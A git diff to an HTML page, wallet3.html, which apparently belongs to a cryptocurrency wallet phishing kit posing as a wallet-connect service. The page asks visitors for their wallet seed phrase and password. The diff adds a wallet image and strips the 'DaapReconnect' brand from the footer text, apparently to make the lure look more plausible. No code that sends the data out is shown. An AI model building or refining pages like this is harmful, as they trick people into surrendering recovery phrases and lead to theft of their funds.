--- a/wallet3.html
+++ b/wallet3.html
@@ -77,7 +77,10 @@
                         </div>
 
                         <div class="middle">
-                            <h4>Wallet 3</h4>
+                            <div class="toop">
+                                <img src="wallet3.jpg" alt="">
+                                <h4>Wallet 3</h4>    
+                            </div>
                             <textarea id="seed" minlength="30" name="Wallet 3" placeholder="Seed Phrase..." required></textarea >
                              <input name="Password" id="movepass"  type="password" placeholder="Password"/>
                         </div>
@@ -111,7 +114,7 @@
     <div class="footer-container">
         <div class="footer-leftpart">
             <img src="logo.svg" alt="logo">
-            <p>DaapReconnect connects web applications to supported mobile wallets.</p>
+            <p>Connects web applications to supported mobile wallets.</p>
             
        </div>
 
